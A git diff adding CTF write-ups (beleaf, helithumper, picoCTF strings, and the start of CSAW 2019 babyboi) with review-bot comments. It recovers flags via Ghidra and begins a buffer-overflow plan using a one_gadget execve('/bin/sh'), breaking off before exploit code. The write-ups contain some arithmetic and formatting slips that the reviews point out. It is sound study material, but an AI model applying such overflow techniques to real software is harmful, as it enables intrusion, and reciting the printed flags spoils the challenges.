+ 0030103a 00 ?? 00h
+ 0030103b 00 ?? 00h
+ 0030103c ff ?? FFh
+ 0030103d ff ?? FFh
+ 0030103e ff ?? FFh
+ 0030103f ff ?? FFh
+ 00301040 62 ?? 62h b
+
+ 00301041 00 ?? 00h
+ 00301042 00 ?? 00h
+ 00301043 00 ?? 00h
+ 00301044 6c ?? 6Ch l
+
+ 00301045 00 ?? 00h
+ 00301046 00 ?? 00h
+ 00301047 00 ?? 00h
+ 00301048 72 ?? 72h r
+
+ 00301049 00 ?? 00h
+ 0030104a 00 ?? 00h
+ 0030104b 00 ?? 00h
+ 0030104c ff ?? FFh
+ 0030104d ff ?? FFh
+ 0030104e ff ?? FFh
+ 0030104f ff ?? FFh
+ 00301050 ff ?? FFh
+ 00301051 ff ?? FFh
+ 00301052 ff ?? FFh
+ 00301053 ff ?? FFh
+ 00301054 ff ?? FFh
+ 00301055 ff ?? FFh
+ 00301056 ff ?? FFh
+ 00301057 ff ?? FFh
+ 00301058 ff ?? FFh
+ 00301059 ff ?? FFh
+ 0030105a ff ?? FFh
+ 0030105b ff ?? FFh
+ 0030105c ff ?? FFh
+ 0030105d ff ?? FFh
+ 0030105e ff ?? FFh
+ 0030105f ff ?? FFh
+ 00301060 ff ?? FFh
+ 00301061 ff ?? FFh
+ 00301062 ff ?? FFh
+ 00301063 ff ?? FFh
+ 00301064 61 ?? 61h a
+
+ 00301065 00 ?? 00h
+ 00301066 00 ?? 00h
+ 00301067 00 ?? 00h
+ 00301068 65 ?? 65h e
+
+ 00301069 00 ?? 00h
+ 0030106a 00 ?? 00h
+ 0030106b 00 ?? 00h
+ 0030106c 69 ?? 69h i
+ [...]
+
+
+
+now when you look at the characters in this array, you can get the feeling that you might be able to type flag{something} with it, so let's follow what the code does with the 2 arrays we found:
+
+we know that the start of the 1020array is 00301020. The character f will output 1 because **((0x00301024 - 0x00301020) / 4) = 1** so this is equal to 1. This 1 also corresponds to the 14e0 array from earlier:
+
+
+ DAT_003014e0 XREF[2]: FUN_001008a1:0010096b(*),
+ FUN_001008a1:00100972(R)
+ 003014e0 01 ?? 01h
+
+ 003014e1 00 ?? 00h
+ 003014e2 00 ?? 00h
+ 003014e3 00 ?? 00h
+ 003014e4 00 ?? 00h
+ 003014e5 00 ?? 00h
+ 003014e6 00 ?? 00h
+ 003014e7 00 ?? 00h
+ 003014e8 09 ?? 09h
+
+ 003014e9 00 ?? 00h
+ 003014ea 00 ?? 00h
+ 003014eb 00 ?? 00h
+ 003014ec 00 ?? 00h
+ 003014ed 00 ?? 00h
+ 003014ee 00 ?? 00h
+ 003014ef 00 ?? 00h
+ 003014f0 11 ?? 11h
+
+ 003014f1 00 ?? 00h
+ 003014f2 00 ?? 00h
+ 003014f3 00 ?? 00h
+ 003014f4 00 ?? 00h
+ 003014f5 00 ?? 00h
+ 003014f6 00 ?? 00h
+ 003014f7 00 ?? 00h
+ 003014f8 27 ?? 27h '
+
+ 003014f9 00 ?? 00h
+ 003014fa 00 ?? 00h
+ 003014fb 00 ?? 00h
+ 003014fc 00 ?? 00h
+ 003014fd 00 ?? 00h
+ 003014fe 00 ?? 00h
+ 003014ff 00 ?? 00h
+ 00301500 02 ?? 02h
+
+ [...]
+
+
+
+and here you have to continue with the 0x9 value,**(0x00301020 + (4*9)) = 0x301044** this address corresponds to the l character
+
+
+ fl
+
+
+
+11 is the third character **(0x00301020 + (4*11)) = 0x301064** this corresponds to the a character
+
+
+ fla
+
+
+27 is the fourth character **(0x00301020 + (4*27)) = 0x3010bc** this corresponds to the g character
+
+
+ flag
+
+
+from here you keep going and you end up with the following:
+
+
+ flag{we_beleaf_in_your_re_future}
+
+
+
+so just run the binary with the flag to verify it is correct:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → ./beleaf
+ Enter the flag
+ >>> flag{we_beleaf_in_your_re_future}
+ Correct!
+
+
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
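Review bot: the address arithmetic is only right if the reader silently switches number bases: after listing the expected values as `0x1 0x9 0x11 0x27 0x2`, the text computes `(0x00301020 + (4*11)) = 0x301064` and `(0x00301020 + (4*27)) = 0x3010bc`, which hold only when 11 and 27 are read as hex (0x11 = 17, 4*17 = 0x44; 0x27 = 39, 4*39 = 0x9c); written as decimal 11 and 27 they give 0x30104c and 0x30108c. Write `4*0x11` and `4*0x27` (or 17 and 39) so the steps reproduce. Second, every `&DAT_...` in the pasted decompiler output has become `&DAT;_...` (`&DAT;_00100a78`, `&DAT;_003014e0`, `&DAT;_00301020`), an HTML-entity mangling from the copy; restore `&DAT_`. Third, the paragraph under `FUN_001007fa` says the function "looks at the 'DAT_003014e0' array with offsets of 4", but the code it follows reads `DAT_00301020`; `DAT_003014e0` is the 8-byte expected-index table in `FUN_001008a1`. While there, the index update `local_10 * 2 + 1` / `(local_10 + 1) * 2` is the left/right child step of a binary tree stored in an array, and the `FF FF FF FF` entries are the `-1` sentinel the `while` condition stops on, which is clearer than "tries to find at which index" and also explains the challenge name. Minor: the link `[helithumper](heli.html)` targets `.html` while the committed file is `heli.md`; `'Enter the flag >>>"` mixes quote characters; "charcater" is misspelled; and the stray backtick before `![]()` plus the two `## Title` / `text` placeholders at the end should go.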
diff --git a/1/heli.md b/1/heli.md
new file mode 100644
index 0000000..1676f36
--- /dev/null
+++ b/1/heli.md
@@ -0,0 +1,294 @@
+# Helithumper Reverse Engineering
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/helithumper_re/rev
+ --2021-02-22 17:19:05-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/helithumper_re/rev
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/helithumper_re/rev [following]
+ --2021-02-22 17:19:05-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/helithumper_re/rev
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 16704 (16K) [application/octet-stream]
+ Saving to: ‘rev’
+
+ rev 100%[===============================================================================>] 16.31K --.-KB/s in 0s
+
+ 2021-02-22 17:19:05 (37.3 MB/s) - ‘rev’ saved [16704/16704]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file rev
+ rev: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e4dbcb1281821db359d566c68fea7380aeb27378, for GNU/Linux 3.2.0, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → chmod +x rev
+
+
+
+` ![]()
+
+## Solution
+
+Run the binary
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → ./rev
+ Welcome to the Salty Spitoon™, How tough are ya?
+ very though
+ Yeah right. Back to Weenie Hut Jr™ with ya
+
+
+here the binary prints some text, then lets us input our text (here its 'very though') and then prints some text again. It is safe to assume that we will need to type the correct passphrase to get the correct output. So let's inspect the binary file from ghidra:
+
+ 
+
+now from here we want to check out the main function of our binary file, so go into the symbol tree tab, into functions, into main, and we get the following code:
+
+
+
+
+ bool main(void)
+
+ {
+ int iVar1;
+ void *pvVar2;
+
+ pvVar2 = calloc(0x32,1);
+ puts(&DAT;_00102008);
+ __isoc99_scanf(&DAT;_0010203b,pvVar2);
+ iVar1 = validate(pvVar2);
+ if (iVar1 == 0) {
+ puts(&DAT;_00102050);
+ }
+ else {
+ puts("Right this way...");
+ }
+ return iVar1 == 0;
+ }
+
+
+
+now here we see something, first of all it does a scanf (to prompt for our input) and then moves our text into pvVar2, then, it calls a function called 'validate' and the result of that function gets put into iVar1 which determines if we get a correct answer or not. So let's inspect the 2 possibilities of the if statement:
+
+
+ if (iVar1 == 0) {
+ puts(&DAT;_00102050);
+ }
+ else {
+ puts("Right this way...");
+ }
+
+
+From ghidra we see that this '&DAT;_00102050' is the string of characters we saw earlier:
+
+
+
+therefore, we do not want iVar1 to be equal to 0, we want iVar1 to be equal to 1
+
+So the hint here is, what is being validated ? How is our input being validated ? we inspect the validate function which HAS TO return 1, if we want our iVar1 to be equal to 1:
+
+
+
+Which gives us the following code:
+
+
+ undefined8 validate(char *param_1)
+
+ {
+ size_t sVar1;
+ undefined8 uVar2;
+ long in_FS_OFFSET;
+ int local_50;
+ int local_48 [4];
+ undefined4 local_38;
+ undefined4 local_34;
+ undefined4 local_30;
+ undefined4 local_2c;
+ undefined4 local_28;
+ undefined4 local_24;
+ undefined4 local_20;
+ undefined4 local_1c;
+ undefined4 local_18;
+ undefined4 local_14;
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ local_48[0] = 0x66;
+ local_48[1] = 0x6c;
+ local_48[2] = 0x61;
+ local_48[3] = 0x67;
+ local_38 = 0x7b;
+ local_34 = 0x48;
+ local_30 = 0x75;
+ local_2c = 0x43;
+ local_28 = 0x66;
+ local_24 = 0x5f;
+ local_20 = 0x6c;
+ local_1c = 0x41;
+ local_18 = 0x62;
+ local_14 = 0x7d;
+ sVar1 = strlen(param_1);
+ local_50 = 0;
+ do {
+ if ((int)sVar1 <= local_50) {
+ uVar2 = 1;
+ LAB_001012b7:
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return uVar2;
+ }
+ if ((int)param_1[local_50] != local_48[local_50]) {
+ uVar2 = 0;
+ goto LAB_001012b7;
+ }
+ local_50 = local_50 + 1;
+ } while( true );
+ }
+
+
+So first of all our input text gets passed into the validate function via the param_1 parameter. It enters a do{} while(); loop, with each iteration of that while loop, there is a value that gets incremented, the only return statements of that function are either return uVar2 or either not making the function return anything at all, instead going to the __stack_chk_fail() function. therefore the important value here is uVar2
+
+
+ int local_48 [4];
+
+ [...]
+
+ local_48[0] = 0x66;
+ local_48[1] = 0x6c;
+ local_48[2] = 0x61;
+ local_48[3] = 0x67;
+
+ [...]
+
+ if ((int)param_1[local_50] != local_48[local_50]) {
+ uVar2 = 0;
+ goto LAB_001012b7;
+ }
+ local_50 = local_50 + 1;
+
+
+Here we see that our each character of our input (param1) gets checked against the corresponding character of the local_48 string. Therefore we need to make sure our input matches the values inside of local_48's 0,1,2,3 characters. so we know we have to look at the following addresses:
+
+
+ 0x66
+ 0x6c
+ 0x61
+ 0x67
+
+
+
+From Ghidra, we see the following assembly code:
+
+
+ 00101205 c7 45 c0 MOV dword ptr [RBP + local_48],0x66
+ 66 00 00 00
+ 0010120c c7 45 c4 MOV dword ptr [RBP + local_44],0x6c
+ 6c 00 00 00
+ 00101213 c7 45 c8 MOV dword ptr [RBP + local_40],0x61
+ 61 00 00 00
+ 0010121a c7 45 cc MOV dword ptr [RBP + local_3c],0x67
+ 67 00 00 00
+
+
+
+
+ 00101221 c7 45 d0 MOV dword ptr [RBP + local_38],0x7b
+ 7b 00 00 00
+ 00101228 c7 45 d4 MOV dword ptr [RBP + local_34],0x48
+ 48 00 00 00
+ 0010122f c7 45 d8 MOV dword ptr [RBP + local_30],0x75
+ 75 00 00 00
+ 00101236 c7 45 dc MOV dword ptr [RBP + local_2c],0x43
+ 43 00 00 00
+ 0010123d c7 45 e0 MOV dword ptr [RBP + local_28],0x66
+ 66 00 00 00
+ 00101244 c7 45 e4 MOV dword ptr [RBP + local_24],0x5f
+ 5f 00 00 00
+ 0010124b c7 45 e8 MOV dword ptr [RBP + local_20],0x6c
+ 6c 00 00 00
+ 00101252 c7 45 ec MOV dword ptr [RBP + local_1c],0x41
+ 41 00 00 00
+ 00101259 c7 45 f0 MOV dword ptr [RBP + local_18],0x62
+ 62 00 00 00
+ 00101260 c7 45 f4 MOV dword ptr [RBP + local_14],0x7d
+ 7d 00 00 00
+
+
+Now from here we can get the list of specific bytes our input needs to be:
+
+
+ 0x66
+ 0x6c
+ 0x61
+ 0x67
+
+ 0x7b
+ 0x48
+ 0x75
+ 0x43
+ 0x66
+ 0x5f
+ 0x6c
+ 0x41
+ 0x62
+ 0x7d
+
+
+Now let's move over to python:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → ls -lash
+ total 788K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Feb 22 17:19 .
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K Feb 22 17:23 ..
+ 20K -rwxr-xr-x 1 nothing nothing 17K Feb 22 17:19 rev
+ 760K -rwxr-xr-x 1 nothing nothing 759K Feb 22 17:12 strings
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file rev
+ rev: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e4dbcb1281821db359d566c68fea7380aeb27378, for GNU/Linux 3.2.0, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → python3
+ Python 3.9.1+ (default, Feb 5 2021, 13:46:56)
+ [GCC 10.2.1 20210110] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> x = [0x66, 0x6c, 0x61, 0x67, 0x7b, 0x48, 0x75, 0x43, 0x66, 0x5f, 0x6c, 0x41, 0x62, 0x7d]
+ >>> input = ""
+ >>> for i in x:
+ ... input += chr(i)
+ ...
+ >>> input
+ 'flag{HuCf_lAb}'
+
+
+And here we see that the first 4 addresses were 'flag' the next 10 were '{HuCf_lAb}', this obviously was fairly easy
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
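Review bot: the values listed after "so we know we have to look at the following addresses" (0x66, 0x6c, 0x61, 0x67) are byte values compared against the input, not addresses; they are the ASCII codes of 'f', 'l', 'a', 'g', and "the first 4 addresses were 'flag'" at the end has the same problem. The decompiler declares `int local_48 [4]`, but the loop `if ((int)param_1[local_50] != local_48[local_50])` runs up to strlen(param_1), so it indexes past the four declared elements into local_38..local_14; the assembly confirms these are one contiguous run of dwords from [RBP + local_48] to [RBP + local_14], which is the reason the ten extra constants belong to the same comparison and deserves a sentence. A caveat worth adding: validate only checks as many characters as the input has and returns 1 as soon as `(int)sVar1 <= local_50`, so any prefix of the expected string (even a lone 'f') is accepted; the length is never verified. The scanf format at DAT_0010203b is not shown; if it is an unbounded %s, the 0x32-byte calloc'd buffer can be overrun, so say which it is. Minor: `&DAT;_00102008`, `&DAT;_0010203b` and `&DAT;_00102050` carry a stray semicolon from HTML-entity escaping (Ghidra prints `&DAT_00102008`), and the trailing "## Title" / "text" / "` ![]()" sections are unfilled template placeholders that should be dropped before merge.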
diff --git a/1/strings.md b/1/strings.md
new file mode 100644
index 0000000..b571547
--- /dev/null
+++ b/1/strings.md
@@ -0,0 +1,75 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/pico18_strings/strings
+ --2021-02-22 17:12:22-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/pico18_strings/strings
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/pico18_strings/strings [following]
+ --2021-02-22 17:12:22-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/pico18_strings/strings
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776368 (758K) [application/octet-stream]
+ Saving to: ‘strings’
+
+ strings 100%[=======================================================================================================================================================================================================>] 758.17K --.-KB/s in 0.1s
+
+ 2021-02-22 17:12:23 (5.86 MB/s) - ‘strings’ saved [776368/776368]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file strings
+ strings: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e337b489c47492dd5dff90353eb227b4e7e69028, not stripped
+
+
+` ![]()
+
+## Solution
+
+The solution is fairly simple, first make the binary file executable, then run it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → chmod +x strings
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/1]
+ → ./strings
+ Have you ever used the 'strings' function? Check out the man pages!
+
+
+Here we are hinted at using the strings function, so we will do so and use grep to try and see if the flag appears, generally the flag contains {flaghash} so we can use grep to find it :
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → strings strings | grep {
+ picoCTF{sTrIngS_sAVeS_Time_3f712a28}
+
+
+
+And we're done!
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
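Review bot: `strings strings | grep {` only works because the flag happens to be the sole string containing a brace; anchoring on the known prefix, e.g. `strings strings | grep -o 'picoCTF{[^}]*}'`, is the robust form and makes the point the prose is trying to make ("generally the flag contains {flaghash}" would be clearer as "picoCTF flags have the form picoCTF{...}"). "strings function" should read "strings utility": it is the binutils command the program's hint refers to, not a function. The empty `![]()` after "And we're done!" and the two "## Title" / "text" / "` ![]()" sections are unfilled template placeholders left in the file.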
diff --git a/2/0.md b/2/0.md
new file mode 100644
index 0000000..bd2c701
--- /dev/null
+++ b/2/0.md
@@ -0,0 +1,84 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+
+
+` ![]()
+
+## Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
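Review bot: this file is an unfilled template: "## Downloading the binary file" and "## Solution" have no body, and the eleven `![]()` image references have no source, so they render as broken images (the 2/*.png files added in this commit are presumably meant to go here). Either write the walkthrough and point the image tags at those files, or leave 2/0.md out of this commit.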
diff --git a/2/1.png b/2/1.png
new file mode 100644
index 0000000..7362644
Binary files /dev/null and b/2/1.png differ
diff --git a/2/10.png b/2/10.png
new file mode 100644
index 0000000..11ce2fc
Binary files /dev/null and b/2/10.png differ
diff --git a/2/11.png b/2/11.png
new file mode 100644
index 0000000..ce165d2
Binary files /dev/null and b/2/11.png differ
diff --git a/2/12.png b/2/12.png
new file mode 100644
index 0000000..31cd0f8
Binary files /dev/null and b/2/12.png differ
diff --git a/2/13.png b/2/13.png
new file mode 100644
index 0000000..ea855d6
Binary files /dev/null and b/2/13.png differ
diff --git a/2/14.png b/2/14.png
new file mode 100644
index 0000000..2273671
Binary files /dev/null and b/2/14.png differ
diff --git a/2/15.png b/2/15.png
new file mode 100644
index 0000000..52c1eed
Binary files /dev/null and b/2/15.png differ
diff --git a/2/16.png b/2/16.png
new file mode 100644
index 0000000..2a4586b
Binary files /dev/null and b/2/16.png differ
diff --git a/2/17.png b/2/17.png
new file mode 100644
index 0000000..1eb1558
Binary files /dev/null and b/2/17.png differ
diff --git a/2/18.png b/2/18.png
new file mode 100644
index 0000000..9964e91
Binary files /dev/null and b/2/18.png differ
diff --git a/2/19.png b/2/19.png
new file mode 100644
index 0000000..2edd6ef
Binary files /dev/null and b/2/19.png differ
diff --git a/2/2.png b/2/2.png
new file mode 100644
index 0000000..c36da1f
Binary files /dev/null and b/2/2.png differ
diff --git a/2/20.png b/2/20.png
new file mode 100644
index 0000000..0dd2cd3
Binary files /dev/null and b/2/20.png differ
diff --git a/2/21.png b/2/21.png
new file mode 100644
index 0000000..e03ebb8
Binary files /dev/null and b/2/21.png differ
diff --git a/2/22.png b/2/22.png
new file mode 100644
index 0000000..a2dda63
Binary files /dev/null and b/2/22.png differ
diff --git a/2/23.png b/2/23.png
new file mode 100644
index 0000000..c377482
Binary files /dev/null and b/2/23.png differ
diff --git a/2/24.png b/2/24.png
new file mode 100644
index 0000000..05a8913
Binary files /dev/null and b/2/24.png differ
diff --git a/2/25.png b/2/25.png
new file mode 100644
index 0000000..15b3bf2
Binary files /dev/null and b/2/25.png differ
diff --git a/2/26.png b/2/26.png
new file mode 100644
index 0000000..8f56007
Binary files /dev/null and b/2/26.png differ
diff --git a/2/27.png b/2/27.png
new file mode 100644
index 0000000..bc1096f
Binary files /dev/null and b/2/27.png differ
diff --git a/2/28.png b/2/28.png
new file mode 100644
index 0000000..4811056
Binary files /dev/null and b/2/28.png differ
diff --git a/2/29.png b/2/29.png
new file mode 100644
index 0000000..8d66b12
Binary files /dev/null and b/2/29.png differ
diff --git a/2/3.png b/2/3.png
new file mode 100644
index 0000000..2a79c4f
Binary files /dev/null and b/2/3.png differ
diff --git a/2/30.png b/2/30.png
new file mode 100644
index 0000000..2be4193
Binary files /dev/null and b/2/30.png differ
diff --git a/2/31.png b/2/31.png
new file mode 100644
index 0000000..66d54da
Binary files /dev/null and b/2/31.png differ
diff --git a/2/32.png b/2/32.png
new file mode 100644
index 0000000..41c0e1a
Binary files /dev/null and b/2/32.png differ
diff --git a/2/33.png b/2/33.png
new file mode 100644
index 0000000..e2d4711
Binary files /dev/null and b/2/33.png differ
diff --git a/2/34.png b/2/34.png
new file mode 100644
index 0000000..74a7a57
Binary files /dev/null and b/2/34.png differ
diff --git a/2/35.png b/2/35.png
new file mode 100644
index 0000000..a2dea85
Binary files /dev/null and b/2/35.png differ
diff --git a/2/4.png b/2/4.png
new file mode 100644
index 0000000..4343514
Binary files /dev/null and b/2/4.png differ
diff --git a/2/40.png b/2/40.png
new file mode 100644
index 0000000..e5300c5
Binary files /dev/null and b/2/40.png differ
diff --git a/2/41.png b/2/41.png
new file mode 100644
index 0000000..b324ae8
Binary files /dev/null and b/2/41.png differ
diff --git a/2/42.png b/2/42.png
new file mode 100644
index 0000000..9544992
Binary files /dev/null and b/2/42.png differ
diff --git a/2/43.png b/2/43.png
new file mode 100644
index 0000000..1201e1b
Binary files /dev/null and b/2/43.png differ
diff --git a/2/44.png b/2/44.png
new file mode 100644
index 0000000..2f064e3
Binary files /dev/null and b/2/44.png differ
diff --git a/2/45.png b/2/45.png
new file mode 100644
index 0000000..ada78c4
Binary files /dev/null and b/2/45.png differ
diff --git a/2/46.png b/2/46.png
new file mode 100644
index 0000000..51bfe39
Binary files /dev/null and b/2/46.png differ
diff --git a/2/47.png b/2/47.png
new file mode 100644
index 0000000..fec2b63
Binary files /dev/null and b/2/47.png differ
diff --git a/2/48.png b/2/48.png
new file mode 100644
index 0000000..6e1d9e8
Binary files /dev/null and b/2/48.png differ
diff --git a/2/49.png b/2/49.png
new file mode 100644
index 0000000..5f4a18f
Binary files /dev/null and b/2/49.png differ
diff --git a/2/5.png b/2/5.png
new file mode 100644
index 0000000..2e5c801
Binary files /dev/null and b/2/5.png differ
diff --git a/2/50.png b/2/50.png
new file mode 100644
index 0000000..46524e7
Binary files /dev/null and b/2/50.png differ
diff --git a/2/51.png b/2/51.png
new file mode 100644
index 0000000..71eb30b
Binary files /dev/null and b/2/51.png differ
diff --git a/2/6.png b/2/6.png
new file mode 100644
index 0000000..67bdb42
Binary files /dev/null and b/2/6.png differ
diff --git a/2/7.png b/2/7.png
new file mode 100644
index 0000000..723bda5
Binary files /dev/null and b/2/7.png differ
diff --git a/2/8.png b/2/8.png
new file mode 100644
index 0000000..77f3ee1
Binary files /dev/null and b/2/8.png differ
diff --git a/2/9.png b/2/9.png
new file mode 100644
index 0000000..3224b3f
Binary files /dev/null and b/2/9.png differ
diff --git a/2/bboi.md b/2/bboi.md
new file mode 100644
index 0000000..53da386
--- /dev/null
+++ b/2/bboi.md
@@ -0,0 +1,308 @@
+# Csaw 2019 babyboi
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csaw19_babyboi/baby_boi
+
+ baby_boi 100%[==========================================================>] 8.41K --.-KB/s in 0.001s
+
+ 2021-03-06 15:19:56 (16.1 MB/s) - ‘baby_boi’ saved [8608/8608]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csaw19_babyboi/baby_boi.c
+
+ baby_boi.c 100%[==========================================================>] 274 --.-KB/s in 0s
+
+ 2021-03-06 15:20:10 (27.1 MB/s) - ‘baby_boi.c’ saved [274/274]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/csaw19_babyboi/libc-2.27.so
+
+ libc-2.27.so 100%[==========================================================>] 1.94M 2.79MB/s in 0.7s
+
+ 2021-03-06 15:20:19 (2.79 MB/s) - ‘libc-2.27.so’ saved [2030544/2030544]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → file baby_boi
+ baby_boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1ff55dce2efc89340b86a666bba5e7ff2b37f62, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → chmod +x baby_boi
+
+
+
+` ![]()
+
+## Solution
+
+first let's run the binary to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./baby_boi
+ Hello!
+ Here I am: 0x7f158ee88590
+ ok
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./baby_boi
+ Hello!
+ Here I am: 0x7f7090800590
+ hello
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./baby_boi
+ Hello!
+ Here I am: 0x7f4a5ed57590
+ bye
+
+
+
+The binary basically outputs some text, then it lekas some memorya ddress, and then lets us put in some text. Let's run pwn checksec on it and check what are the other files about:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → pwn checksec baby_boi
+ [*] '/home/nothing/binexp/2/bboi/baby_boi'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → cat baby_boi.c
+ #include
+ #include
+
+ int main(int argc, char **argv[]) {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+
+ char buf[32];
+ printf("Hello!\n");
+ printf("Here I am: %p\n", printf);
+ gets(buf);
+ }
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./libc-2.27.so
+ zsh: permission denied: ./libc-2.27.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → chmod +x libc-2.27.so
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → ./libc-2.27.so
+ Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!
+
+
+
+
+Now here we see that the binary just prompts us for text, and looking at the sourcecode, we see that it prints the libc address for printf. After that, it makes a **gets** call on a fixed size buffer of 32 bytes (0x20 bytes) so this means that we have a buffer overflow. We also see that the libc version is **2.27** The only binary protection that we have is NX.
+
+To exploit this, we will use the buffer overflow vulnerability we just mentionned, and then we will call a oneshot gadget, which is a single ROP gadget in the libc library that will call **execve("/bin/sh")** given the right conditions, we find this using the [one_gadget](https://github.com/david942j/one_gadget) utility:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [~]
+ → sudo pacman -S rubygems
+ [sudo] password for nothing:
+ warning: rubygems-3.2.13-1 is up to date -- reinstalling
+ resolving dependencies...
+ looking for conflicting packages...
+
+ Package (1) Old Version New Version Net Change
+
+ extra/rubygems 3.2.13-1 3.2.13-1 0.00 MiB
+
+ Total Installed Size: 0.92 MiB
+ Net Upgrade Size: 0.00 MiB
+
+ :: Proceed with installation? [Y/n] y
+ (1/1) checking keys in keyring [----------------------------------------------] 100%
+ (1/1) checking package integrity [----------------------------------------------] 100%
+ (1/1) loading package files [----------------------------------------------] 100%
+ (1/1) checking for file conflicts [----------------------------------------------] 100%
+ (1/1) checking available disk space [----------------------------------------------] 100%
+ :: Processing package changes...
+ (1/1) reinstalling rubygems [----------------------------------------------] 100%
